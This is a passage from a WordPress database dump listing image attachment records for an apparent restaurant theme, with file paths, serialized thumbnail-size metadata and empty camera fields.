";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51327,703,'_wp_attachment_image_alt','f'),(51328,4250,'_wp_attached_file','2018/07/h1-img-10.jpg'),(51329,4250,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:272;s:6:\"height\";i:255;s:4:\"file\";s:21:\"2018/07/h1-img-10.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51330,4250,'_wp_attachment_image_alt','m'),(51331,4247,'_wp_attachment_image_alt','w'),(51332,4251,'_wp_attached_file','2018/08/chef-bio-img.jpg'),(51333,4251,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:1415;s:4:\"file\";s:24:\"2018/08/chef-bio-img.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"chef-bio-img-233x300.jpg\";s:5:\"width\";i:233;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"chef-bio-img-796x1024.jpg\";s:5:\"width\";i:796;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"chef-bio-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"chef-bio-img-768x988.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:988;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:24:\"chef-bio-img-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:25:\"chef-bio-img-1100x650.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:25:\"chef-bio-img-650x1300.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:26:\"chef-bio-img-1100x1300.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"chef-bio-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"chef-bio-img-600x772.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:772;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"chef-bio-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"chef-bio-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"chef-bio-img-600x772.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:772;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"chef-bio-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51334,4252,'_wp_attached_file','2018/07/pin-img-1.png'),(51335,4252,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:119;s:6:\"height\";i:119;s:4:\"file\";s:21:\"2018/07/pin-img-1.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"pin-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"pin-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51336,4252,'_wp_attachment_image_alt','m'),(51337,4246,'_wp_attachment_image_alt','m'),(51338,4253,'_wp_attached_file','2018/08/h1-img-12.jpg'),(51339,4253,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:560;s:6:\"height\";i:560;s:4:\"file\";s:21:\"2018/08/h1-img-12.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h1-img-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h1-img-12-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h1-img-12-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51340,4248,'_wp_attachment_image_alt','m'),(51341,39,'_wp_attached_file','2018/07/shop-img-2.jpg'),(51342,39,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:22:\"2018/07/shop-img-2.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"shop-img-2-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"shop-img-2-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:22:\"shop-img-2-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"shop-img-2-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:22:\"shop-img-2-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"shop-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"shop-img-2-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"shop-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"shop-img-2-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51343,4253,'_wp_attachment_image_alt','m'),(51344,4254,'_wp_attached_file','2018/07/h1-img-11.jpg'),(51345,4254,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:421;s:4:\"file\";s:21:\"2018/07/h1-img-11.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h1-img-11-300x132.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:132;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"h1-img-11-768x337.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:21:\"h1-img-11-650x421.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:421;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:21:\"h1-img-11-650x421.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:421;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h1-img-11-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"h1-img-11-600x263.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:263;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h1-img-11-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"h1-img-11-600x263.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:263;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51346,4255,'_wp_attached_file','2018/07/h1-port-img-2.jpg'),(51347,4255,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:916;s:4:\"file\";s:25:\"2018/07/h1-port-img-2.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h1-port-img-2-262x300.jpg\";s:5:\"width\";i:262;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h1-port-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"h1-port-img-2-768x879.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:879;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"h1-port-img-2-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:25:\"h1-port-img-2-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:25:\"h1-port-img-2-650x916.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:916;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h1-port-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"h1-port-img-2-600x687.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:687;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h1-port-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"h1-port-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"h1-port-img-2-600x687.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:687;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h1-port-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51348,4256,'_wp_attached_file','2018/07/port-single-img-2-1.jpg'),(51349,4256,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1093;s:4:\"file\";s:31:\"2018/07/port-single-img-2-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"port-single-img-2-1-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"port-single-img-2-1-1024x861.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:861;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"port-single-img-2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"port-single-img-2-1-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:31:\"port-single-img-2-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:32:\"port-single-img-2-1-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:32:\"port-single-img-2-1-650x1093.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1093;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"port-single-img-2-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"port-single-img-2-1-600x504.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"port-single-img-2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"port-single-img-2-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"port-single-img-2-1-600x504.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"port-single-img-2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51350,4257,'_wp_attached_file','2018/08/drink-menu-backround.jpg'),(51351,4257,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:32:\"2018/08/drink-menu-backround.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"drink-menu-backround-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"drink-menu-backround-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"drink-menu-backround-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"drink-menu-backround-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:33:\"drink-menu-backround-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:32:\"drink-menu-backround-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:33:\"drink-menu-backround-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:33:\"drink-menu-backround-650x1100.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:34:\"drink-menu-backround-1300x1100.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"drink-menu-backround-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"drink-menu-backround-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"drink-menu-backround-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"drink-menu-backround-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"drink-menu-backround-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"drink-menu-backround-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51352,39,'_wp_attachment_image_alt','e'),(51353,4254,'_wp_attachment_image_alt','m'),(51354,4251,'_wp_attachment_image_alt','k'),(51355,4255,'_wp_attachment_image_alt','m'),(51356,4258,'_wp_attached_file','2018/07/shop-img-3.jpg'),(51357,4258,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:22:\"2018/07/shop-img-3.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"shop-img-3-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"shop-img-3-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:22:\"shop-img-3-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"shop-img-3-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:22:\"shop-img-3-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"shop-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"shop-img-3-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"shop-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"shop-img-3-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s